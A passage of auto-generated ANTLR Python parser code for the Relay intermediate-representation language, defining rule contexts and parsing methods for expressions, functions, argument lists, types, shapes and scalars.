self.expr(0)
self.state = 113
self.match(RelayParser.T__11)
self.state = 114
self.match(RelayParser.T__9)
self.state = 115
self.expr(5)
pass
elif la_ == 11:
localctx = RelayParser.GraphContext(self, localctx)
self._ctx = localctx
_prevctx = localctx
self.state = 117
self.ident()
self.state = 118
self.match(RelayParser.T__8)
self.state = 119
self.expr(0)
self.state = 120
self.match(RelayParser.T__9)
self.state = 121
self.expr(3)
pass
elif la_ == 12:
localctx = RelayParser.IdentExprContext(self, localctx)
self._ctx = localctx
_prevctx = localctx
self.state = 123
self.ident()
pass
elif la_ == 13:
localctx = RelayParser.ScalarExprContext(self, localctx)
self._ctx = localctx
_prevctx = localctx
self.state = 124
self.scalar()
pass
self._ctx.stop = self._input.LT(-1)
self.state = 157
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,11,self._ctx)
while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:
if _alt==1:
if self._parseListeners is not None:
self.triggerExitRuleEvent()
_prevctx = localctx
self.state = 155
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,10,self._ctx)
if la_ == 1:
localctx = RelayParser.BinOpContext(self, RelayParser.ExprContext(self, _parentctx, _parentState))
self.pushNewRecursionContext(localctx, _startState, self.RULE_expr)
self.state = 127
if not self.precpred(self._ctx, 16):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 16)")
self.state = 128
localctx.op = self._input.LT(1)
_la = self._input.LA(1)
if not(_la==RelayParser.MUL or _la==RelayParser.DIV):
localctx.op = self._errHandler.recoverInline(self)
else:
self._errHandler.reportMatch(self)
self.consume()
self.state = 129
self.expr(17)
pass
elif la_ == 2:
localctx = RelayParser.BinOpContext(self, RelayParser.ExprContext(self, _parentctx, _parentState))
self.pushNewRecursionContext(localctx, _startState, self.RULE_expr)
self.state = 130
if not self.precpred(self._ctx, 15):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 15)")
self.state = 131
localctx.op = self._input.LT(1)
_la = self._input.LA(1)
if not(_la==RelayParser.ADD or _la==RelayParser.SUB):
localctx.op = self._errHandler.recoverInline(self)
else:
self._errHandler.reportMatch(self)
self.consume()
self.state = 132
self.expr(16)
pass
elif la_ == 3:
localctx = RelayParser.BinOpContext(self, RelayParser.ExprContext(self, _parentctx, _parentState))
self.pushNewRecursionContext(localctx, _startState, self.RULE_expr)
self.state = 133
if not self.precpred(self._ctx, 14):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 14)")
self.state = 134
localctx.op = self._input.LT(1)
_la = self._input.LA(1)
if not((((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << RelayParser.LT) | (1 << RelayParser.GT) | (1 << RelayParser.LE) | (1 << RelayParser.GE))) != 0)):
localctx.op = self._errHandler.recoverInline(self)
else:
self._errHandler.reportMatch(self)
self.consume()
self.state = 135
self.expr(15)
pass
elif la_ == 4:
localctx = RelayParser.BinOpContext(self, RelayParser.ExprContext(self, _parentctx, _parentState))
self.pushNewRecursionContext(localctx, _startState, self.RULE_expr)
self.state = 136
if not self.precpred(self._ctx, 13):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 13)")
self.state = 137
localctx.op = self._input.LT(1)
_la = self._input.LA(1)
if not(_la==RelayParser.EQ or _la==RelayParser.NE):
localctx.op = self._errHandler.recoverInline(self)
else:
self._errHandler.reportMatch(self)
self.consume()
self.state = 138
self.expr(14)
pass
elif la_ == 5:
localctx = RelayParser.LetContext(self, RelayParser.ExprContext(self, _parentctx, _parentState))
self.pushNewRecursionContext(localctx, _startState, self.RULE_expr)
self.state = 139
if not self.precpred(self._ctx, 4):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 4)")
self.state = 140
self.match(RelayParser.T__9)
self.state = 141
self.expr(5)
pass
elif la_ == 6:
localctx = RelayParser.CallContext(self, RelayParser.ExprContext(self, _parentctx, _parentState))
self.pushNewRecursionContext(localctx, _startState, self.RULE_expr)
self.state = 142
if not self.precpred(self._ctx, 18):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 18)")
self.state = 143
self.match(RelayParser.T__0)
self.state = 152
self._errHandler.sync(self)
_la = self._input.LA(1)
if (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << RelayParser.T__0) | (1 << RelayParser.T__3) | (1 << RelayParser.T__5) | (1 << RelayParser.T__7) | (1 << RelayParser.T__12) | (1 << RelayParser.SUB) | (1 << RelayParser.GLOBAL_VAR) | (1 << RelayParser.LOCAL_VAR) | (1 << RelayParser.GRAPH_VAR) | (1 << RelayParser.BOOL_LIT) | (1 << RelayParser.FLOAT) | (1 << RelayParser.NAT) | (1 << RelayParser.CNAME))) != 0):
self.state = 144
self.expr(0)
self.state = 149
self._errHandler.sync(self)
_la = self._input.LA(1)
while _la==RelayParser.T__2:
self.state = 145
self.match(RelayParser.T__2)
self.state = 146
self.expr(0)
self.state = 151
self._errHandler.sync(self)
_la = self._input.LA(1)
self.state = 154
self.match(RelayParser.T__1)
pass
self.state = 159
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,11,self._ctx)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.unrollRecursionContexts(_parentctx)
return localctx
class FuncContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def argList(self):
return self.getTypedRuleContext(RelayParser.ArgListContext,0)
def body(self):
return self.getTypedRuleContext(RelayParser.BodyContext,0)
def typeParamSeq(self):
return self.getTypedRuleContext(RelayParser.TypeParamSeqContext,0)
def type_(self):
return self.getTypedRuleContext(RelayParser.Type_Context,0)
def getRuleIndex(self):
return RelayParser.RULE_func
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitFunc" ):
return visitor.visitFunc(self)
else:
return visitor.visitChildren(self)
def func(self):
localctx = RelayParser.FuncContext(self, self._ctx, self.state)
self.enterRule(localctx, 6, self.RULE_func)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 160
self.match(RelayParser.T__12)
self.state = 162
self._errHandler.sync(self)
_la = self._input.LA(1)
if _la==RelayParser.T__3:
self.state = 161
self.typeParamSeq()
self.state = 164
self.match(RelayParser.T__0)
self.state = 165
self.argList()
self.state = 166
self.match(RelayParser.T__1)
self.state = 169
self._errHandler.sync(self)
_la = self._input.LA(1)
if _la==RelayParser.T__13:
self.state = 167
self.match(RelayParser.T__13)
self.state = 168
self.type_()
self.state = 171
self.body()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class DefnContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def ident(self):
return self.getTypedRuleContext(RelayParser.IdentContext,0)
def argList(self):
return self.getTypedRuleContext(RelayParser.ArgListContext,0)
def body(self):
return self.getTypedRuleContext(RelayParser.BodyContext,0)
def typeParamSeq(self):
return self.getTypedRuleContext(RelayParser.TypeParamSeqContext,0)
def type_(self):
return self.getTypedRuleContext(RelayParser.Type_Context,0)
def getRuleIndex(self):
return RelayParser.RULE_defn
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitDefn" ):
return visitor.visitDefn(self)
else:
return visitor.visitChildren(self)
def defn(self):
localctx = RelayParser.DefnContext(self, self._ctx, self.state)
self.enterRule(localctx, 8, self.RULE_defn)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 173
self.match(RelayParser.T__14)
self.state = 174
self.ident()
self.state = 176
self._errHandler.sync(self)
_la = self._input.LA(1)
if _la==RelayParser.T__3:
self.state = 175
self.typeParamSeq()
self.state = 178
self.match(RelayParser.T__0)
self.state = 179
self.argList()
self.state = 180
self.match(RelayParser.T__1)
self.state = 183
self._errHandler.sync(self)
_la = self._input.LA(1)
if _la==RelayParser.T__13:
self.state = 181
self.match(RelayParser.T__13)
self.state = 182
self.type_()
self.state = 185
self.body()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class ArgListContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def varList(self):
return self.getTypedRuleContext(RelayParser.VarListContext,0)
def attrList(self):
return self.getTypedRuleContext(RelayParser.AttrListContext,0)
def getRuleIndex(self):
return RelayParser.RULE_argList
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitArgList" ):
return visitor.visitArgList(self)
else:
return visitor.visitChildren(self)
def argList(self):
localctx = RelayParser.ArgListContext(self, self._ctx, self.state)
self.enterRule(localctx, 10, self.RULE_argList)
try:
self.state = 193
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,16,self._ctx)
if la_ == 1:
self.enterOuterAlt(localctx, 1)
self.state = 187
self.varList()
pass
elif la_ == 2:
self.enterOuterAlt(localctx, 2)
self.state = 188
self.attrList()
pass
elif la_ == 3:
self.enterOuterAlt(localctx, 3)
self.state = 189
self.varList()
self.state = 190
self.match(RelayParser.T__2)
self.state = 191
self.attrList()
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class VarListContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def var(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(RelayParser.VarContext)
else:
return self.getTypedRuleContext(RelayParser.VarContext,i)
def getRuleIndex(self):
return RelayParser.RULE_varList
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitVarList" ):
return visitor.visitVarList(self)
else:
return visitor.visitChildren(self)
def varList(self):
localctx = RelayParser.VarListContext(self, self._ctx, self.state)
self.enterRule(localctx, 12, self.RULE_varList)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 203
self._errHandler.sync(self)
_la = self._input.LA(1)
if (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << RelayParser.GLOBAL_VAR) | (1 << RelayParser.LOCAL_VAR) | (1 << RelayParser.GRAPH_VAR) | (1 << RelayParser.CNAME))) != 0):
self.state = 195
self.var()
self.state = 200
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,17,self._ctx)
while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:
if _alt==1:
self.state = 196
self.match(RelayParser.T__2)
self.state = 197
self.var()
self.state = 202
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,17,self._ctx)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class VarContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def ident(self):
return self.getTypedRuleContext(RelayParser.IdentContext,0)
def type_(self):
return self.getTypedRuleContext(RelayParser.Type_Context,0)
def getRuleIndex(self):
return RelayParser.RULE_var
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitVar" ):
return visitor.visitVar(self)
else:
return visitor.visitChildren(self)
def var(self):
localctx = RelayParser.VarContext(self, self._ctx, self.state)
self.enterRule(localctx, 14, self.RULE_var)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 205
self.ident()
self.state = 208
self._errHandler.sync(self)
_la = self._input.LA(1)
if _la==RelayParser.T__15:
self.state = 206
self.match(RelayParser.T__15)
self.state = 207
self.type_()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class AttrListContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def attr(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(RelayParser.AttrContext)
else:
return self.getTypedRuleContext(RelayParser.AttrContext,i)
def getRuleIndex(self):
return RelayParser.RULE_attrList
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitAttrList" ):
return visitor.visitAttrList(self)
else:
return visitor.visitChildren(self)
def attrList(self):
localctx = RelayParser.AttrListContext(self, self._ctx, self.state)
self.enterRule(localctx, 16, self.RULE_attrList)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 218
self._errHandler.sync(self)
_la = self._input.LA(1)
if _la==RelayParser.CNAME:
self.state = 210
self.attr()
self.state = 215
self._errHandler.sync(self)
_la = self._input.LA(1)
while _la==RelayParser.T__2:
self.state = 211
self.match(RelayParser.T__2)
self.state = 212
self.attr()
self.state = 217
self._errHandler.sync(self)
_la = self._input.LA(1)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class AttrContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def CNAME(self):
return self.getToken(RelayParser.CNAME, 0)
def expr(self):
return self.getTypedRuleContext(RelayParser.ExprContext,0)
def getRuleIndex(self):
return RelayParser.RULE_attr
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitAttr" ):
return visitor.visitAttr(self)
else:
return visitor.visitChildren(self)
def attr(self):
localctx = RelayParser.AttrContext(self, self._ctx, self.state)
self.enterRule(localctx, 18, self.RULE_attr)
try:
self.enterOuterAlt(localctx, 1)
self.state = 220
self.match(RelayParser.CNAME)
self.state = 221
self.match(RelayParser.T__8)
self.state = 222
self.expr(0)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class TypeParamSeqContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def ident(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(RelayParser.IdentContext)
else:
return self.getTypedRuleContext(RelayParser.IdentContext,i)
def getRuleIndex(self):
return RelayParser.RULE_typeParamSeq
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitTypeParamSeq" ):
return visitor.visitTypeParamSeq(self)
else:
return visitor.visitChildren(self)
def typeParamSeq(self):
localctx = RelayParser.TypeParamSeqContext(self, self._ctx, self.state)
self.enterRule(localctx, 20, self.RULE_typeParamSeq)
self._la = 0 # Token type
try:
self.state = 237
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,23,self._ctx)
if la_ == 1:
self.enterOuterAlt(localctx, 1)
self.state = 224
self.match(RelayParser.T__3)
self.state = 225
self.match(RelayParser.T__4)
pass
elif la_ == 2:
self.enterOuterAlt(localctx, 2)
self.state = 226
self.match(RelayParser.T__3)
self.state = 227
self.ident()
self.state = 232
self._errHandler.sync(self)
_la = self._input.LA(1)
while _la==RelayParser.T__2:
self.state = 228
self.match(RelayParser.T__2)
self.state = 229
self.ident()
self.state = 234
self._errHandler.sync(self)
_la = self._input.LA(1)
self.state = 235
self.match(RelayParser.T__4)
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Type_Context(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def getRuleIndex(self):
return RelayParser.RULE_type_
def copyFrom(self, ctx:ParserRuleContext):
super().copyFrom(ctx)
class IntTypeContext(Type_Context):
def __init__(self, parser, ctx:ParserRuleContext): # actually a RelayParser.Type_Context
super().__init__(parser)
self.copyFrom(ctx)
def NAT(self):
return self.getToken(RelayParser.NAT, 0)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitIntType" ):
return visitor.visitIntType(self)
else:
return visitor.visitChildren(self)
class TupleTypeContext(Type_Context):
def __init__(self, parser, ctx:ParserRuleContext): # actually a RelayParser.Type_Context
super().__init__(parser)
self.copyFrom(ctx)
def type_(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(RelayParser.Type_Context)
else:
return self.getTypedRuleContext(RelayParser.Type_Context,i)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitTupleType" ):
return visitor.visitTupleType(self)
else:
return visitor.visitChildren(self)
class TypeIdentTypeContext(Type_Context):
def __init__(self, parser, ctx:ParserRuleContext): # actually a RelayParser.Type_Context
super().__init__(parser)
self.copyFrom(ctx)
def typeIdent(self):
return self.getTypedRuleContext(RelayParser.TypeIdentContext,0)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitTypeIdentType" ):
return visitor.visitTypeIdentType(self)
else:
return visitor.visitChildren(self)
class IncompleteTypeContext(Type_Context):
def __init__(self, parser, ctx:ParserRuleContext): # actually a RelayParser.Type_Context
super().__init__(parser)
self.copyFrom(ctx)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitIncompleteType" ):
return visitor.visitIncompleteType(self)
else:
return visitor.visitChildren(self)
class TensorTypeContext(Type_Context):
def __init__(self, parser, ctx:ParserRuleContext): # actually a RelayParser.Type_Context
super().__init__(parser)
self.copyFrom(ctx)
def shapeSeq(self):
return self.getTypedRuleContext(RelayParser.ShapeSeqContext,0)
def type_(self):
return self.getTypedRuleContext(RelayParser.Type_Context,0)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitTensorType" ):
return visitor.visitTensorType(self)
else:
return visitor.visitChildren(self)
class FuncTypeContext(Type_Context):
def __init__(self, parser, ctx:ParserRuleContext): # actually a RelayParser.Type_Context
super().__init__(parser)
self.copyFrom(ctx)
def type_(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(RelayParser.Type_Context)
else:
return self.getTypedRuleContext(RelayParser.Type_Context,i)
def typeParamSeq(self):
return self.getTypedRuleContext(RelayParser.TypeParamSeqContext,0)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitFuncType" ):
return visitor.visitFuncType(self)
else:
return visitor.visitChildren(self)
def type_(self):
localctx = RelayParser.Type_Context(self, self._ctx, self.state)
self.enterRule(localctx, 22, self.RULE_type_)
self._la = 0 # Token type
try:
self.state = 284
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,28,self._ctx)
if la_ == 1:
localctx = RelayParser.TupleTypeContext(self, localctx)
self.enterOuterAlt(localctx, 1)
self.state = 239
self.match(RelayParser.T__0)
self.state = 240
self.match(RelayParser.T__1)
pass
elif la_ == 2:
localctx = RelayParser.TupleTypeContext(self, localctx)
self.enterOuterAlt(localctx, 2)
self.state = 241
self.match(RelayParser.T__0)
self.state = 242
self.type_()
self.state = 243
self.match(RelayParser.T__2)
self.state = 244
self.match(RelayParser.T__1)
pass
elif la_ == 3:
localctx = RelayParser.TupleTypeContext(self, localctx)
self.enterOuterAlt(localctx, 3)
self.state = 246
self.match(RelayParser.T__0)
self.state = 247
self.type_()
self.state = 250
self._errHandler.sync(self)
_la = self._input.LA(1)
while True:
self.state = 248
self.match(RelayParser.T__2)
self.state = 249
self.type_()
self.state = 252
self._errHandler.sync(self)
_la = self._input.LA(1)
if not (_la==RelayParser.T__2):
break
self.state = 254
self.match(RelayParser.T__1)
pass
elif la_ == 4:
localctx = RelayParser.TypeIdentTypeContext(self, localctx)
self.enterOuterAlt(localctx, 4)
self.state = 256
self.typeIdent()
pass
elif la_ == 5:
localctx = RelayParser.TensorTypeContext(self, localctx)
self.enterOuterAlt(localctx, 5)
self.state = 257
self.match(RelayParser.T__16)
self.state = 258
self.match(RelayParser.T__3)
self.state = 259
self.shapeSeq()
self.state = 260
self.match(RelayParser.T__2)
self.state = 261
self.type_()
self.state = 262
self.match(RelayParser.T__4)
pass
elif la_ == 6:
localctx = RelayParser.FuncTypeContext(self, localctx)
self.enterOuterAlt(localctx, 6)
self.state = 264
self.match(RelayParser.T__12)
self.state = 266
self._errHandler.sync(self)
_la = self._input.LA(1)
if _la==RelayParser.T__3:
self.state = 265
self.typeParamSeq()
self.state = 268
self.match(RelayParser.T__0)
self.state = 277
self._errHandler.sync(self)
_la = self._input.LA(1)
if (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << RelayParser.T__0) | (1 << RelayParser.T__12) | (1 << RelayParser.T__16) | (1 << RelayParser.T__17) | (1 << RelayParser.NAT) | (1 << RelayParser.CNAME))) != 0):
self.state = 269
self.type_()
self.state = 274
self._errHandler.sync(self)
_la = self._input.LA(1)
while _la==RelayParser.T__2:
self.state = 270
self.match(RelayParser.T__2)
self.state = 271
self.type_()
self.state = 276
self._errHandler.sync(self)
_la = self._input.LA(1)
self.state = 279
self.match(RelayParser.T__1)
self.state = 280
self.match(RelayParser.T__13)
self.state = 281
self.type_()
pass
elif la_ == 7:
localctx = RelayParser.IncompleteTypeContext(self, localctx)
self.enterOuterAlt(localctx, 7)
self.state = 282
self.match(RelayParser.T__17)
pass
elif la_ == 8:
localctx = RelayParser.IntTypeContext(self, localctx)
self.enterOuterAlt(localctx, 8)
self.state = 283
self.match(RelayParser.NAT)
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class ShapeSeqContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def shape(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(RelayParser.ShapeContext)
else:
return self.getTypedRuleContext(RelayParser.ShapeContext,i)
def getRuleIndex(self):
return RelayParser.RULE_shapeSeq
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitShapeSeq" ):
return visitor.visitShapeSeq(self)
else:
return visitor.visitChildren(self)
def shapeSeq(self):
localctx = RelayParser.ShapeSeqContext(self, self._ctx, self.state)
self.enterRule(localctx, 24, self.RULE_shapeSeq)
self._la = 0 # Token type
try:
self.state = 303
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,30,self._ctx)
if la_ == 1:
self.enterOuterAlt(localctx, 1)
self.state = 286
self.match(RelayParser.T__0)
self.state = 287
self.match(RelayParser.T__1)
pass
elif la_ == 2:
self.enterOuterAlt(localctx, 2)
self.state = 288
self.match(RelayParser.T__0)
self.state = 289
self.shape()
self.state = 290
self.match(RelayParser.T__2)
self.state = 291
self.match(RelayParser.T__1)
pass
elif la_ == 3:
self.enterOuterAlt(localctx, 3)
self.state = 293
self.match(RelayParser.T__0)
self.state = 294
self.shape()
self.state = 297
self._errHandler.sync(self)
_la = self._input.LA(1)
while True:
self.state = 295
self.match(RelayParser.T__2)
self.state = 296
self.shape()
self.state = 299
self._errHandler.sync(self)
_la = self._input.LA(1)
if not (_la==RelayParser.T__2):
break
self.state = 301
self.match(RelayParser.T__1)
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class ShapeContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def getRuleIndex(self):
return RelayParser.RULE_shape
def copyFrom(self, ctx:ParserRuleContext):
super().copyFrom(ctx)
class ParensShapeContext(ShapeContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a RelayParser.ShapeContext
super().__init__(parser)
self.copyFrom(ctx)
def shape(self):
return self.getTypedRuleContext(RelayParser.ShapeContext,0)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitParensShape" ):
return visitor.visitParensShape(self)
else:
return visitor.visitChildren(self)
class IntShapeContext(ShapeContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a RelayParser.ShapeContext
super().__init__(parser)
self.copyFrom(ctx)
def NAT(self):
return self.getToken(RelayParser.NAT, 0)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitIntShape" ):
return visitor.visitIntShape(self)
else:
return visitor.visitChildren(self)
def shape(self):
localctx = RelayParser.ShapeContext(self, self._ctx, self.state)
self.enterRule(localctx, 26, self.RULE_shape)
try:
self.state = 310
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [RelayParser.T__0]:
localctx = RelayParser.ParensShapeContext(self, localctx)
self.enterOuterAlt(localctx, 1)
self.state = 305
self.match(RelayParser.T__0)
self.state = 306
self.shape()
self.state = 307
self.match(RelayParser.T__1)
pass
elif token in [RelayParser.NAT]:
localctx = RelayParser.IntShapeContext(self, localctx)
self.enterOuterAlt(localctx, 2)
self.state = 309
self.match(RelayParser.NAT)
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class TypeIdentContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def CNAME(self):
return self.getToken(RelayParser.CNAME, 0)
def getRuleIndex(self):
return RelayParser.RULE_typeIdent
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitTypeIdent" ):
return visitor.visitTypeIdent(self)
else:
return visitor.visitChildren(self)
def typeIdent(self):
localctx = RelayParser.TypeIdentContext(self, self._ctx, self.state)
self.enterRule(localctx, 28, self.RULE_typeIdent)
try:
self.enterOuterAlt(localctx, 1)
self.state = 312
self.match(RelayParser.CNAME)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class BodyContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def expr(self):
return self.getTypedRuleContext(RelayParser.ExprContext,0)
def getRuleIndex(self):
return RelayParser.RULE_body
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitBody" ):
return visitor.visitBody(self)
else:
return visitor.visitChildren(self)
def body(self):
localctx = RelayParser.BodyContext(self, self._ctx, self.state)
self.enterRule(localctx, 30, self.RULE_body)
try:
self.enterOuterAlt(localctx, 1)
self.state = 314
self.match(RelayParser.T__10)
self.state = 315
self.expr(0)
self.state = 316
self.match(RelayParser.T__11)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class ScalarContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def getRuleIndex(self):
return RelayParser.RULE_scalar
def copyFrom(self, ctx:ParserRuleContext):
super().copyFrom(ctx)
class ScalarFloatContext(ScalarContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a RelayParser.ScalarContext
super().__init__(parser)
self.copyFrom(ctx)
def FLOAT(self):
return self.getToken(RelayParser.FLOAT, 0)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitScalarFloat" ):
return visitor.visitScalarFloat(self)
else:
return visitor.visitChildren(self)
class ScalarBoolContext(ScalarContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a RelayParser.ScalarContext
super().__init__(parser)
self.copyFrom(ctx)
def BOOL_LIT(self):
return self.getToken(RelayParser.BOOL_LIT, 0)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitScalarBool" ):
return visitor.visitScalarBool(self)
else:
return visitor.visitChildren(self)
class ScalarIntContext(ScalarContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a RelayParser.ScalarContext
super().__init__(parser)
self.copyFrom(ctx)
def NAT(self):
return self.getToken(RelayParser.NAT, 0)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitScalarInt" ):
return visitor.visitScalarInt(self)
else:
return visitor.visitChildren(self)
def scalar(self):
localctx = RelayParser.ScalarContext(self, self._ctx, self.state)
self.enterRule(localctx, 32, self.RULE_scalar)
try:
self.state = 321
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [RelayParser.FLOAT]:
localctx = RelayParser.ScalarFloatContext(self, localctx)
self.enterOuterAlt(localctx, 1)
self.state = 318
self.match(RelayParser.FLOAT)
pass
elif token in [RelayParser.NAT]:
localctx = RelayParser.ScalarIntContext(self, localctx)
self.enterOuterAlt(localctx, 2)
self.state = 319
self.match(RelayParser.NAT)
pass
elif token in [RelayParser.BOOL_LIT]:
localctx = RelayParser.ScalarBoolContext(self, localctx)
self.enterOuterAlt(localctx, 3)
self.state = 320
self.match(RelayParser.BOOL_LIT)
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class IdentContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def opIdent(self):
return self.getTypedRuleContext(RelayParser.OpIdentContext,0)
def GLOBAL_VAR(self):
return self.getToken(RelayParser.GLOBAL_VAR, 0)
def LOCAL_VAR(self):
return self.getToken(RelayParser.LOCAL_VAR, 0)
def GRAPH_VAR(self):
return self.getToken(RelayParser.GRAPH_VAR, 0)
def getRuleIndex(self):
return RelayParser.RULE_ident
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitIdent" ):
return visitor.visitIdent(self)
else:
